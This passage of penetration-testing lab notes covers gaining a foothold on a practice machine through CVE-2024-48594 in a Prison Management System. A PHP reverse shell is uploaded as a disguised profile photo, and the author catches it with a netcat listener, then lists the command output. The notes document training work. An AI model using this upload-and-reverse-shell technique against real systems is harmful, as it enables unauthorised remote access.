CVE-2024-48594
The target Prison Management System instance appears to suffer from CVE-2024-48594 Following the PoC
/Practice/vmdak/3-Exploitation/attachments/{49A4C75D-4DC1-4569-A082-9522F773F7BB}.png)
Heading over to the Edit Photo tab as the admin user
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vmdak]
└─$ mv shell.php shell.jpgI will then rename the payload
/Practice/vmdak/3-Exploitation/attachments/{BB7B4E98-682A-4CA0-B74A-188421E138CB}.png)
/Practice/vmdak/3-Exploitation/attachments/{C554F5A7-BD32-407D-AF5A-1E94A5586FE5}.png)
/Practice/vmdak/3-Exploitation/attachments/{C9D654C8-7AD3-428A-A1A8-58D9A4842A35}.png)
Changing the extension to PHP
/Practice/vmdak/3-Exploitation/attachments/{C50C7B8B-BA46-4F76-8524-CB3ED7D726FC}.png)
Payload uploaded
/Practice/vmdak/3-Exploitation/attachments/{36E8394C-8A9A-4980-8A1D-999F631E8B56}.png)
The web application is loading the “profile photo”
This will trigger the PHP reverse shell
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vmdak]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.157] from (UNKNOWN) [192.168.125.103] 33884
SOCKET: Shell has connected! PID: 3104
whoami
www-data
hostname
vmdak.local
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:fa:06 brd ff:ff:ff:ff:ff:ff
altname enp3s0
inet 192.168.125.103/24 brd 192.168.125.255 scope global ens160
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the www-data account via exploiting CVE-2024-48594